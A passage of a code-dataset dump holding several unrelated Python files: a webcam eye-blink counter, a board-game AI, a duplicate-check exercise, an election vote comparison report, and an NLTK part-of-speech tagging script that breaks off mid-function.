self.start_Bool = False\n\n def start(self):\n self.dist_Bool = False\n self.ebc_Bool = False\n self.start_Bool = True\n\n def clear(self):\n self.dist_label['text'] = \"\"\n self.blink_count_label['text'] = \"\"\n self.TOTAL = 0\n\n def update(self):\n # Get a frame from the video source\n ret, frame = self.vid.get_frame()\n if ret:\n newframe = cv2.resize(\n frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)))\n self.photo = PIL.ImageTk.PhotoImage(\n image=PIL.Image.fromarray(newframe))\n self.canvas.create_image(0, 0, image=self.photo, anchor=tkinter.NW)\n\n if self.dist_Bool and self.start_Bool is False:\n self.distance(frame)\n if self.ebc_Bool and self.start_Bool is False:\n self.eye_blink_count(frame)\n if self.start_Bool:\n self.distance(frame)\n self.eye_blink_count(frame)\n\n self.window.after(self.delay, self.update)\n\n def distance(self, frame):\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rects = self.detector(gray, 0)\n for rect in rects:\n shape = self.predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n area = cv2.contourArea(\n np.reshape(shape, (68, 1, 2)))\n self.dist_label['text'] = area\n if area > 15000:\n self.dist_label['bg'] = 'red'\n else:\n self.dist_label['bg'] = 'green'\n\n def eye_aspect_ratio(self, eye):\n A = dist.euclidean(eye[1], eye[5])\n B = dist.euclidean(eye[2], eye[4])\n C = dist.euclidean(eye[0], eye[3])\n ear = (A + B) / (2.0 * C)\n return ear\n\n def eye_blink_count(self, frame):\n leftEAR = 0\n rightEAR = 0\n ear = 0\n leftEye = 0\n rightEye = 0\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rects = self.detector(gray, 0)\n for rect in rects:\n shape = self.predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n leftEye = shape[self.lStart:self.lEnd]\n rightEye = shape[self.rStart:self.rEnd]\n leftEAR = self.eye_aspect_ratio(leftEye)\n rightEAR = self.eye_aspect_ratio(rightEye)\n\n ear = (leftEAR + rightEAR)/2.0\n try:\n leftEyeHull = cv2.convexHull(leftEye)\n rightEyeHull = cv2.convexHull(rightEye)\n cv2.drawContours(\n frame, [leftEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(\n frame, [rightEyeHull], -1, (0, 255, 0), 1)\n if ear < self.EYE_AR_THRESH:\n self.COUNTER += 1\n else:\n if self.COUNTER >= self.EYE_AR_CONSEC_FRAMES:\n self.TOTAL += 1\n self.COUNTER = 0\n self.blink_count_label['text'] = self.TOTAL\n except Exception as e:\n print(e, 'eye blink count error')\n\n\nclass MyVideoCapture:\n def __init__(self, video_source=0):\n # Open the video source\n self.vid = cv2.VideoCapture(video_source)\n\n if not self.vid.isOpened():\n raise ValueError(\"Unable to open video source\", video_source)\n\n # Get video source width and height\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n def get_frame(self):\n if self.vid.isOpened():\n ret, frame = self.vid.read()\n frame = cv2.flip(frame, 1)\n if ret:\n return (ret, cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n else:\n return (ret, None)\n else:\n return (False, None)\n\n # Release the video source when the object is destroyed\n def __del__(self):\n if self.vid.isOpened():\n self.vid.release()\n\n\nApp(tkinter.Tk(), \"Tkinter and OpenCV\")\n","sub_path":"main6.py","file_name":"main6.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"310785949","text":"import random\n\nclass AI:\n def __init__(self,mark):\n self.mark = mark\n self.attack_strategies = []\n self.defence_strategies = []\n f1 = self.vertical_strategies\n f2 = self.horizontal_strategies\n f3 = self.diagonal1_strategies\n f4 = self.diagonal2_strategies\n self.strategy_functions = (f1,f2,f3,f4)\n\n def update_defence_strategies(self,x,y):\n for strategy in self.defence_strategies:\n if (x,y) in strategy:\n strategy.remove((x,y))\n\n\n def update_attack_strategies(self,x,y):\n for strategy in self.attack_strategies:\n if (x,y) in strategy:\n strategy.remove((x,y))\n\n\n def delete_attack_strategies(self,x,y):\n a = self.attack_strategies\n self.attack_strategies = [s for s in a if (x,y) not in s]\n\n\n def delete_defence_strategies(self,x,y):\n d = self.defence_strategies\n self.defence_strategies = [s for s in d if (x,y) not in s]\n\n\n def one_left(self):\n for strategy in self.attack_strategies:\n if len(strategy) == 1:\n return next(iter(strategy)) # Get the only element\n\n for strategy in self.defence_strategies:\n if len(strategy) == 1:\n return next(iter(strategy)) # Get the only element\n\n return None\n\n\n def attack_defence_union(self):\n # This is unused\n for a_strategy in self.attack_strategies:\n for d_strategy in self.defence_strategies:\n union = a_strategy & d_strategy\n if len(union) > 0:\n # Get one element from the union set\n return next(iter(union)) \n\n return None\n\n\n def shortest_strategy(self,needed):\n if self.attack_strategies and self.defence_strategies:\n # Both not empty\n attack = self.shortest_attack()\n defence = self.shortest_defence()\n shortest_strategy = min(attack,defence,key=len) \n\n elif self.attack_strategies and not self.defence_strategies:\n # Defence empty, attack not empty\n shortest_strategy = self.shortest_attack()\n\n elif self.defence_strategies and not self.attack_strategies:\n # Attack empty, defence not empty\n shortest_strategy = self.shortest_defence()\n\n if len(shortest_strategy) <= needed // 2 + 1:\n return next(iter(shortest_strategy)) \n\n return None\n\n\n def shortest_attack(self):\n candidate = self.attack_strategies[0]\n for strategy in self.attack_strategies:\n if len(strategy) < len(candidate):\n candidate = strategy\n return candidate\n\n\n def shortest_defence(self):\n candidate = self.defence_strategies[0]\n for strategy in self.defence_strategies:\n if len(strategy) < len(candidate):\n candidate = strategy\n return candidate\n\n\n\n def random_from_strategies(self):\n s = random.choice(self.defence_strategies + self.attack_strategies)\n return random.sample(s,1)[0]\n\n\n def random_from_empty_slots(self,board):\n return random.sample(board.empty_slots,1)[0]\n\n\n def most_common(self):\n all_coords = []\n\n for strat in self.attack_strategies + self.defence_strategies:\n all_coords += list(strat)\n\n most_common = all_coords[0]\n most_common_amount = all_coords.count(most_common)\n\n for candidate in all_coords:\n candidate_amount = all_coords.count(candidate)\n if candidate_amount > most_common_amount:\n most_common = candidate\n most_common_amount = candidate_amount\n\n if most_common_amount == 1:\n return None\n\n return most_common\n\n\n def make_decision(self,needed,board):\n if not self.attack_strategies and not self.defence_strategies:\n # Both strategies empty\n return self.random_from_empty_slots(board)\n\n move = self.one_left()\n if move is not None:\n return move\n\n move = self.shortest_strategy(needed)\n if move is not None:\n return move\n\n move = self.most_common()\n if move is not None:\n return move\n\n return self.random_from_strategies()\n \n\n def make_a_move(self,board,needed,x,y):\n self.delete_attack_strategies(x,y)\n self.update_defence_strategies(x,y)\n self.new_defence_strategies(board,needed,x,y)\n \n move = self.make_decision(needed,board)\n\n self.delete_defence_strategies(move[0],move[1])\n self.update_attack_strategies(move[0],move[1])\n self.new_attack_strategies(board,needed,move[0],move[1])\n\n return move\n\n\n def new_defence_strategies(self,board,needed,x,y,):\n for f in self.strategy_functions:\n for strategy in f(board,needed,x,y):\n self.defence_strategies.append(strategy)\n\n\n def new_attack_strategies(self,board,needed,x,y,):\n for f in self.strategy_functions:\n for strategy in f(board,needed,x,y):\n self.attack_strategies.append(strategy)\n\n\n\n def vertical_strategies(self,board,needed,recentX,recentY):\n # Vertical strategies. Base moves down\n strategies = []\n for i in range(needed):\n y = recentY+i\n strategy = set()\n \n for j in range(needed):\n strategy.add((recentX,y-j))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n\n return strategies\n\n\n def horizontal_strategies(self,board,needed,recentX,recentY):\n # Horizontal strategies. Base moves left.\n strategies = []\n for i in range(needed):\n x = recentX-i\n strategy = set()\n\n for j in range(needed):\n strategy.add((x+j,recentY))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n \n return strategies\n\n\n def diagonal1_strategies(self,board,needed,recentX,recentY):\n # Diagonal strategies. Base moves downleft.\n strategies = []\n for i in range(needed):\n x = recentX-i\n y = recentY+i\n strategy = set()\n\n for j in range(needed):\n strategy.add((x+j,y-j))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n\n return strategies\n\n\n def diagonal2_strategies(self,board,needed,recentX,recentY):\n # Diagonal strategies. Base moves downright.\n strategies = []\n for i in range(needed):\n x = recentX+i\n y = recentY+i\n strategy = set()\n\n for j in range(needed):\n strategy.add((x-j,y-j))\n strategy.remove((recentX,recentY))\n\n for coord in strategy:\n if coord not in board.empty_slots:\n break\n else:\n strategies.append(strategy)\n\n return strategies\n\n","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"420223402","text":"'''\nGiven an integer array nums, return true if any value appears at least twice in the array, and return false if every element is distinct.\nInput: nums = [1,2,3,1]\nOutput: true\n'''\n\ndef containsDuplicateDict(nums):\n dict = {}\n for num in nums:\n if num in dict:\n return True\n dict[num] = 0\n\n return False\n\ndef containsDuplicateSorted(nums):\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] == nums[i - 1]:\n return True\n \n return False","sub_path":"217.contains_duplicate.py","file_name":"217.contains_duplicate.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"10269231","text":"\"\"\"Comparison rpt.py\n\n Submodule to dbase.py for constructing the Comparison Report,\n which contains data merged from data imported from the Elections\n department and data accumulated by our vote counting.\n\n Usage: from comparison_rpt import ElectionRpt\n er = ElectionRpt()\n er.run(election_data_iter, our_data_iter\n print(er.header_line)\n for tuple in er.build_output):\n print(tuple)\n\n Possible input iterables include SQL selections.\n Possible output incldes CSV.\"\"\"\n\nfrom __future__ import annotations\nfrom collections.abc import Iterable, Callable\nfrom util import divz\n\nclass SimpleRepr(object): # https://stackoverflow.com/questions/44595218/python-repr-for-all-member-variables\n \"\"\"A mixin implementing a simple __repr__.\"\"\"\n def __repr__(self):\n return \"<{klass} @{id:x} {attrs}>\".format(\n klass=self.__class__.__name__,\n id=id(self) & 0xFFFFFF,\n attrs=\" \".join(\"{}={!r}\".format(k, v) for k, v in self.__dict__.items()),\n )\n\n# def rpt_brk_last(a, b):\n# # Return the last instance seen, ignoring the rest\n# return b\n#\n# class RptBreak(SimpleRepr):\n# \"\"\"Accumulate some data and return it a key value changes.\n#\n# The key values must respond to !=\n#\n# The accumulated values can be any objects that are collected\n# in a list until a break in the key values is seen.\n# \"\"\"\n#\n# def __init__(self, num_keys:int, num_accumulators:int):\n# self.key_values = [None] * num_keys\n# self.accums = [[]] * num_accumulators\n# self.first = True\n#\n# def next(self, key_values:list, objs:list[object]):\n# assert len(key_values) == len(self.key_values), 'wrong number of keys'\n# assert len(objs) == len(self.sum_values), 'wrong number of values'\n# if self.first:\n# self.key_values = key_values\n# self.accums = objs\n# self.first = False\n# return None\n#\n# if key_values != self.key_values:\n# self.key_values = key_values\n# ret = self.accums.copy()\n# self.accums = objs\n# return ret\n#\n# else:\n# for i in len(self.accums):\n# self.accums[i].append(objs[i])\n#\n# return None\n#\n# def last(self):\n# return self.accums\n\n\nclass Choice(SimpleRepr):\n \"\"\"One of the choices in a PrecinctContest\"\"\"\n\n def __init__(self, choice_name:str):\n self.choice_name = choice_name\n # data from Elections\n self.elec_votes = 0\n self.elec_winner_f = False # flag if this choice is a winner\n # data from our counts\n self.our_votes = 0\n self.our_winner_f = False # flag if this choice is a winner\n self.our_range_low = 0\n self.our_range_high = 0\n self.discrepancy = '' # elec votes vs our range\n self.winners = '' # our winner vs elec\n\n\nclass PrecinctContest(SimpleRepr):\n \"\"\"A contest for a specific precinct with N choices.\"\"\"\n\n def __init__(self, precinct:str, contest:str):\n self.precinct = precinct\n self.contest = contest\n self.elec_unrslvd_wi = 0 # elec unresolved write-ins\n self.elec_undervotes = 0\n self.elec_overvotes = 0\n self.ballots_cast = 0 # see elecs_computed_bc\n self.elecs_computed_bc = 0 # ballots cast recomputed\n self.elec_margin = 0\n self.choices:dict[Choice] = dict()\n self.votes_allowed = None\n self.num_images = 0\n self.page_nums = list()\n self.our_unrslvd_wi = 0 # Our unresolved write-ins\n self.our_undervotes = 0 # our underevotes\n self.our_overvotes = 0 # our overvotes\n self.our_undetrmd = 0 # our undetermined (aka \"suspicious\")\n self.marked_unsuspic = 0 # number of unsuspicious marked choices\n self.cnt_unsuspic = 0 # count of unsuspicious choices\n self.our_mc_ratio = 0 # ratio of marked to total choices\n self.disagree_winner_f = False # we disagree with elecs on winner\n\n def add_elec_data(self, elec_overvotes, elec_undervotes, ballots_cast):\n self.elec_undervotes = elec_undervotes\n self.elec_overvotes = elec_overvotes\n self.ballots_cast = ballots_cast\n\n def add_our_data(self, undervotes, overvotes, votes_allowed,\n suspicion, num_images, page_num, marked_unsuspic,\n cnt_unsuspic):\n self.our_undervotes = undervotes\n self.our_overvotes = overvotes\n self.votes_allowed = votes_allowed\n self.our_undetrmd = suspicion\n self.num_images = num_images\n self.marked_unsuspic = marked_unsuspic # number of unsuspicious marked choices\n self.cnt_unsuspic = cnt_unsuspic # count of unsuspicious choices\n self.add_page_num(page_num)\n\n def add_page_num(self, page_num):\n if page_num not in self.page_nums:\n self.page_nums.append(page_num)\n\n def disp_page_nums(self)->str:\n \"\"\"Return page numbers separated by spaces\"\"\"\n\n return ','.join(sorted(self.page_nums))\n\n def same(self, other:PrecinctContest)->bool:\n \"\"\"Close enough to be the same\"\"\"\n\n return type(other) == type(self) \\\n and self.precinct == other.precinct \\\n and self.contest == other.contest\n\n def add_choice_elec(self, choice:Choice):\n \"\"\"Add a choice with elecs data\"\"\"\n\n assert choice.choice_name not in self.choices\n self.choices[choice.choice_name] = choice\n\n def update_choice_ours(self, choice_name:str, our_votes:int):\n \"\"\"Call with one choice which usually is already here\n from elec data and add our info.\"\"\"\n\n c = self.choices.get(choice_name, Choice(choice_name))\n c.our_votes = our_votes\n\n def vote_gap(self):\n \"\"\"Return (low, high) the difference between our lowest\n and highest estimate for this contest.\"\"\"\n\n low = - (self.votes_allowed * self.our_undetrmd)\n high = self.votes_allowed * (self.our_overvotes + \\\n self.our_undetrmd) \\\n + self.our_unrslvd_wi\n return low, high\n\nclass ElectionRpt(SimpleRepr):\n \"\"\"Container for all Precinct_contests in an election.\"\"\"\n\n def __init__(self):\n\n # the key for pct_contests is (precinct_name, contest_name)\n self.pct_contests:dict[PrecinctContest] = dict()\n\n def run(self, elec_rows:Iterable, our_rows:Iterable):\n \"\"\"This is the MAIN.\"\"\"\n\n self._load_elec_results(elec_rows)\n self._merge_our_results(our_rows)\n self._compute_elecs_ballot_count()\n self._create_totals()\n self._compute_winners()\n self._compute_our_ranges()\n for t in self._output_rows():\n yield t\n\n def _add_contest(self, pc: PrecinctContest):\n t = pc.precinct, pc.contest\n assert t not in self.pct_contests\n self.pct_contests[t] = pc\n\n def _load_elec_results(self, elec_rows):\n \"\"\"Deserialize elec_rows into the pct_contests structure.\"\"\"\n\n first_time = True\n curr_contest = None\n for row in elec_rows:\n next_contest = PrecinctContest(row.pct, row.contest)\n next_contest.add_elec_data(row.num_overvotes,\n row.num_undervotes, row.ballots_cast)\n if first_time:\n curr_contest = next_contest\n first_time = False\n if not curr_contest.same(next_contest):\n self._add_contest(curr_contest)\n curr_contest = next_contest\n\n choice = Choice(row.choice)\n if 'write-ins' in choice.choice_name.lower():\n curr_contest.elec_unrslvd_wi += row.num_votes\n continue # we don't add this as a choice\n\n choice.elec_votes = row.num_votes\n curr_contest.add_choice_elec(choice)\n\n self._add_contest(curr_contest) # close contest after last row\n\n def _merge_our_results(self, our_rows):\n \"\"\"Merge our results into the precinct/contests from elecs\"\"\"\n\n for row in our_rows:\n key = row.precinct, row.contest_name\n pc = self.pct_contests.get(key,\n PrecinctContest(row.precinct, row.contest_name))\n pc.add_our_data(row.undervotes_by_pct, row.overvotes_by_pct,\n row.votes_allowed, row.suspicion_by_pct,\n row.num_images, row.page_number, row.marked,\n row.cnt_unsuspic)\n if 'write in' in row.choice_name.lower():\n pc.our_unrslvd_wi += row.votes_by_pct\n continue # Don't treat this as a choice.\n pc.update_choice_ours(row.choice_name, row.votes_by_pct)\n\n def _compute_elecs_ballot_count(self):\n # For sides 1 & 2 thus will get the same value as\n # pc.ballots_cast. For sides 3 and 4 it will give\n # a better value for comparing to our image count.\n\n for pc in self.pct_contests.values():\n x = pc.votes_allowed * pc.elec_overvotes \\\n + pc.elec_unrslvd_wi + pc.elec_undervotes \\\n + sum([z.elec_votes for z in pc.choices.values()])\n pc.elecs_computed_bc = x / pc.votes_allowed\n\n def _create_totals(self):\n \"\"\"Add a pseudo precinct for county-wide totals.\"\"\"\n\n totl = ' Cnty'\n newpccs = dict()\n for pc in self.pct_contests.values():\n k = totl, pc.contest\n newpc = newpccs.get(k, PrecinctContest(totl, pc.contest))\n newpc.ballots_cast += pc.ballots_cast\n newpc.elecs_computed_bc += pc.elecs_computed_bc\n newpc.num_images += pc.num_images\n newpc.elec_unrslvd_wi += pc.elec_unrslvd_wi\n newpc.elec_undervotes += pc.elec_undervotes\n newpc.elec_overvotes += pc.elec_overvotes\n newpc.our_unrslvd_wi += pc.our_unrslvd_wi\n newpc.our_undervotes += pc.our_undervotes\n newpc.our_overvotes += pc.our_overvotes\n newpc.our_undetrmd += pc.our_undetrmd\n newpc.votes_allowed = pc.votes_allowed\n newpc.cnt_unsuspic += pc.cnt_unsuspic\n newpc.marked_unsuspic += pc.marked_unsuspic\n for n in pc.page_nums:\n newpc.add_page_num(n)\n\n newchoices = newpc.choices\n for chk in pc.choices.keys():\n newchoice = newchoices.get(chk, Choice(chk))\n pcc = pc.choices[chk]\n newchoice.elec_votes += pcc.elec_votes\n newchoice.our_votes += pcc.our_votes\n newchoice.our_range_low += pcc.our_range_low\n newchoice.our_range_high += pcc.our_range_high\n newchoices[chk] = newchoice\n\n newpc.choices = newchoices\n newpccs[k] = newpc\n\n for k in newpccs.keys():\n self.pct_contests[k] = newpccs[k]\n\n def _compute_our_ranges(self):\n \"\"\"Compute our low and high values and discrepancy.\"\"\"\n\n for pc in self.pct_contests.values():\n if pc.contest == 'Proposition 20':\n print(pc.precinct)\n\n chcs = pc.choices.values()\n # tot_choices = len(chcs)\n # num_marked = sum([ch.our_votes for ch in chcs])\n marked_ratio = pc.marked_unsuspic / pc.cnt_unsuspic\n for ch in chcs:\n if ch.our_votes:\n ch.our_range_low = ch.our_votes\n ch.our_range_high = \\\n ch.our_votes \\\n + pc.our_unrslvd_wi \\\n + pc.votes_allowed * pc.our_overvotes\n if pc.our_undetrmd:\n r = 1 - marked_ratio\n reduction = min(round(pc.our_undetrmd * r),1)\n ch.our_range_low -= reduction\n r = marked_ratio\n enhancement = min(round(pc.our_undetrmd * r),1)\n ch.our_range_high += enhancement\n\n # compute discrepancy field\n d = ''\n if ch.elec_votes < ch.our_range_low:\n d = ch.elec_votes - ch.our_range_low\n elif ch.elec_votes > ch.our_range_high:\n d = ch.elec_votes - ch.our_range_high\n if d != '':\n ch.discrepancy = f'{d:+}'\n\n def _compute_winners(self):\n # compute margin and then winners by election counts and our counts\n for pc in self.pct_contests.values():\n choices = pc.choices.values()\n\n # compute margins based on election votes\n srt_ch = sorted(choices, key=lambda ch: ch.elec_votes,\n reverse=True)\n if len(srt_ch) <= pc.votes_allowed:\n pc.elec_margin = srt_ch[-1].elec_votes\n else:\n pc.elec_margin = srt_ch[pc.votes_allowed - 1].elec_votes - \\\n srt_ch[pc.votes_allowed].elec_votes\n\n # flag election winners\n for i in range(pc.votes_allowed):\n ch = srt_ch[i]\n v = ch.elec_votes\n if v > 0:\n ch.winners += '<'\n\n\n srt_ch = sorted(choices, key=lambda ch: ch.our_votes,\n reverse=True)\n # flag our winners\n for i in range(pc.votes_allowed):\n ch = srt_ch[i]\n v = ch.elec_votes\n if v > 0:\n ch.winners += '>'\n\n def header_line(self):\n return (\"Precinct\", \"Contest\", \"Choice\", \"Elec Votes\",\n \"Notes\", \"Our Low\", \"Our High\", \"Out of Range\",\n \"Est. Elec Ballots Cast\", \"Our Number of Images\",\n \"Ball Cast - # Imgs\", \"Side Number\",\n \"Elec Invalid Write In\", \"Our Unresolved Write In\",\n \"Elec Overvotes\", \"Our Overvotes\",\n \"Elec Undervotes\", \"Our Undervotes\", \"Our Tentative\")\n\n def _build_output_row(self, pc:PrecinctContest, ch:Choice):\n \"\"\"Return a detail row\"\"\"\n\n return \\\n [pc.precinct, pc.contest, ch.choice_name, ch.elec_votes,\n ch.winners, ch.our_range_low, ch.our_range_high,\n ch.discrepancy]\n\n def _output_rows(self):\n \"\"\"Yield output rows interleaving breaks on contest.\"\"\"\n\n # output the detail lines\n num_cols = len(self.header_line())\n for k in sorted(self.pct_contests.keys()):\n pc = self.pct_contests[k]\n sum_elec_votes = sum_our_votes = 0\n for ch in sorted(pc.choices.values(),\n key=lambda cho: cho.elec_votes,\n reverse=True):\n sum_our_votes += ch.our_votes\n sum_elec_votes += ch.elec_votes\n outrow = self._build_output_row(pc, ch)\n outrow += (num_cols - len(outrow)) * ['']\n yield outrow\n\n # output the summary at the bottom\n vg = pc.vote_gap()\n r = vg[1] - vg[0]\n rm = divz(r, pc.elec_margin) # R/M ratio\n break_row = [pc.precinct, pc.contest,\n (f'R/M: {rm:.0%}; Totals: '), sum_elec_votes,\n '*' if rm >= 1 else '',\n sum_our_votes + vg[0], sum_our_votes + vg[1],\n '', # Out of Range Column\n pc.elecs_computed_bc, pc.num_images,\n abs(pc.elecs_computed_bc - pc.num_images),\n pc.disp_page_nums(),\n pc.elec_unrslvd_wi, pc.our_unrslvd_wi,\n pc.elec_overvotes, pc.our_overvotes,\n pc.elec_undervotes, pc.our_undervotes,\n pc.our_undetrmd]\n\n yield break_row\n yield [''] * num_cols # blank row\n","sub_path":"rpts/comparison_rpt.py","file_name":"comparison_rpt.py","file_ext":"py","file_size_in_byte":16101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"648391848","text":"#coding: utf-8\nfrom analisarFoto import analisarImagem\nfrom eventosHardware import *\n\ni = 1\nwhile i >= 1:\n\ti += 1\n\tif i == 3:\n\t\tprint(\"Aguardando o botão ser pressionado\")\n\tif capturarEvento() == 1:\n\t\tprint(analisarImagem())\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"521070242","text":"import random\nimport nltk\nfrom nltk.corpus import stopwords\nimport datetime\n\n# read file and append a list of all lines\ndef file_to_list(src_file, total_list):\n with open(src_file, 'r', encoding='utf-8') as source_file:\n for line in source_file:\n total_list.append(line)\n return\n\n\n# check and return\n# pos_tokens = [-1, -1, '', ''] , line number, match or not, position, token, pos attribute\n# pos sequence: NN, VERB, ADJ\ndef check_pos_token(src_line, stoplist):\n src_tokens = src_line.split()\n tagged = nltk.pos_tag(src_tokens)\n pos_tokens = [[-1, -1, '', ''], [-1, -1, '', ''], [-1, -1, '', '']]\n\n for i in range(len(src_tokens)):\n # not process stopwords and non-unique words in the same sentence\n if src_tokens[i] in stoplist:\n continue\n if src_tokens.count(src_tokens[i]) != 1:\n continue\n if tagged[i][1].find('N') == 0 and pos_tokens[0][0] < 0:\n pos_tokens[0][0] = 1\n pos_tokens[0][1] = i\n pos_tokens[0][2] = src_tokens[i]\n pos_tokens[0][3] = tagged[i][1]\n if tagged[i][1].find('V') == 0 and pos_tokens[1][0] < 0:\n pos_tokens[1][0] = 1\n pos_tokens[1][1] = i\n pos_tokens[1][2] = src_tokens[i]\n pos_tokens[1][3] = tagged[i][1]\n if tagged[i][1].find('J') == 0 and pos_tokens[2][0] < 0:\n pos_tokens[2][0] = 1\n pos_tokens[2][1] = i\n pos_tokens[2][2] = src_tokens[i]\n pos_tokens[2][3] = tagged[i][1]\n return pos_tokens\n\n\n# Calculate the total number of lines in a text file\ndef cal_lines(source_txt):\n number_lines = 0\n with open(source_txt, 'r', encoding='utf-8') as source_file:\n for line in source_file:\n number_lines += 1\n source_file.close()\n return number_lines\n\n\n# Insert a tag with its token into a line of text\ndef insert_cw_tag(line, tag, flag_noun, token_noun, posi_noun, flag_verb, token_verb, posi_verb, flag_adj,\n token_adj, posi_adj):\n if tag == 'CW':\n open_copy = ''\n close_copy = ''\n list_token = line.split()\n list_token.append('\\n')\n # replace the token at 'position' to 'token' and return\n # sort and replace from the latter position to the beginning position\n insert_list = [[-1, '']]\n if flag_noun > 0:\n insert_list.append([posi_noun, token_noun])\n if flag_verb > 0:\n insert_list.append([posi_verb, token_verb])\n if flag_adj > 0:\n insert_list.append([posi_adj, token_adj])\n insert_list.pop(0)\n print('insert list')\n print(insert_list)\n insert_list.sort(key=lambda x: x[0], reverse=True)\n if len(insert_list) > 0:\n for i in range(len(insert_list)):\n list_token.pop(insert_list[i][0])\n list_token.insert(insert_list[i][0], open_copy + ' ' + insert_list[i][1] + ' ' + close_copy)\n return ' '.join(list_token)\n\n\ndef pos_process_src(read_file, write_file, src_noun_list, src_verb_list, src_adj_list):\n line_number_noun = src_noun_list[0][0]\n src_token_noun = src_noun_list[0][3]\n # src_pos_noun = src_noun_list[0][4]\n total_process_lines_noun = len(src_verb_list)\n line_number_verb = src_verb_list[0][0]\n src_token_verb = src_verb_list[0][3]\n # src_pos_verb = src_verb_list[0][4]\n total_process_lines_verb = len(src_verb_list)\n line_number_adj = src_adj_list[0][0]\n src_token_adj = src_adj_list[0][3]\n # src_pos_adj = src_adj_list[0][4]\n total_process_lines_adj = len(src_adj_list)\n j_noun = 0\n j_verb = 0\n j_adj = 0\n flag_noun = -1\n flag_verb = -1\n flag_adj = -1\n line_number = 0\n with open(read_file, 'r', encoding='utf-8') as source_file, open(write_file, 'w',\n encoding='utf-8') as target_file:\n for line in source_file:\n if line_number % 3000 == 0:\n print(atetime.datetime.now(), 'reading and writing, line ', line_number)\n if j_noun < total_process_lines_noun and line_number == line_number_noun:\n # insert pos tag with token to the specific line\n flag_noun = 1\n\n if j_verb < total_process_lines_verb and line_number == line_number_verb:\n # insert pos tag with token to the specific line\n flag_verb = 1\n\n if j_adj < total_process_lines_adj and line_number == line_number_adj:\n # insert pos tag with token to the specific line\n flag_adj = 1\n\n # insert pos tag with token to the specific line\n if flag_noun > 0 or flag_verb > 0 or flag_adj > 0:\n line = insert_cw_tag(line, 'CW', flag_noun, src_token_noun, src_noun_list[j_noun][2],\n flag_verb, src_token_verb, src_verb_list[j_verb][2], flag_adj, src_token_adj,\n src_adj_list[j_adj][2])\n target_file.write(line)\n\n if flag_noun > 0:\n if j_noun < (total_process_lines_noun - 1):\n j_noun += 1\n line_number_noun = src_noun_list[j_noun][0]\n src_token_noun = src_noun_list[j_noun][3]\n if flag_verb > 0:\n j_verb += 1\n if j_verb < (total_process_lines_verb - 1):\n line_number_verb = src_verb_list[j_verb][0]\n src_token_verb = src_verb_list[j_verb][3]\n if flag_adj > 0:\n j_adj += 1\n if j_adj < (total_process_lines_adj - 1):\n line_number_adj = src_adj_list[j_adj][0]\n src_token_adj = src_adj_list[j_adj][3]\n\n flag_noun = -1\n flag_verb = -1\n flag_adj = -1\n line_number += 1\n source_file.close()\n target_file.close()\n return\n\n\ndef main():\n # parameters: ratio, filenames\n # percentage of lines for processing\n ratio = 0.01\n\n # prepare the stoplist\n stoplist = stopwords.words('english')\n\n # path for source text (before processing)\n source_txt_rd = './UNv1.0.testset.en'\n # path for source text(after processing)\n source_txt_wr = './UNv1.0.testset.encw'\n\n # path for target text(before processing) --not to process the tgt for now\n target_txt_rd = './UNv1.0.testset.zh'\n # path for target text(after processing)\n # target_txt_wr = './UNv1.0.testset.zhcho'\n\n # compare the number of lines in source and target, if not same, quit\n total_lines = cal_lines(source_txt_rd)\n if len(target_txt_rd) > 3 and total_lines != cal_lines(target_txt_rd):\n print('source and target text have different numbers of lines')\n return\n print('total lines in file = ')\n print(total_lines)\n # calculate the TotalProcessLines\n total_process_lines = int(ratio * total_lines)\n print('total processing lines = ')\n print(total_process_lines)\n\n # initial toke_list(one tokens a sentence maximum)\n src_noun_list = [[-1, -1, -1, '', '']] # line number, match, token position, token, pos\n src_verb_list = [[-1, -1, -1, '', '']] # line number, match, token position, token, pos\n src_adj_list = [[-1, -1, -1, '', '']] # line number, match, token position, token, pos\n # tgt_token_list = [[-1, -1, '']] #line number, token position, token\n for i in range(total_lines - 1):\n src_noun_list.append([-1, -1, -1, '', ''])\n src_verb_list.append([-1, -1, -1, '', ''])\n src_adj_list.append([-1, -1, -1, '', ''])\n # tgt_token_list.append([-1, -1, ''])\n # print(len(src_token_list))\n\n # generate the src token(xxx) and its corresponding POS token with the help of nltk\n\n # read src and tgt files to line lists\n src_total_list = ['']\n # tgt_total_list = ['']\n file_to_list(source_txt_rd, src_total_list)\n # file_to_list(target_txt_rd, tgt_total_list)\n src_total_list.pop(0)\n # tgt_total_list.pop(0)\n\n # for tokens generated, scan the whole file to get a pos-token list, then randomly pick from it\n for i in range(total_lines):\n if i % 3000 == 0:\n print(datetime.datetime.now(), 'check pos, line:', i)\n # process line by line,\n # return from 'check' : match= 1 true or -1 false, token position, token, its POS\n pos_tokens = check_pos_token(src_total_list[i], stoplist)\n src_noun_list[i][0] = i # keep the line number for future sorting\n src_noun_list[i][1] = pos_tokens[0][0] # match or not\n src_noun_list[i][2] = pos_tokens[0][1] # token position\n src_noun_list[i][3] = pos_tokens[0][2] # token\n src_noun_list[i][4] = pos_tokens[0][3] # pos attribute\n 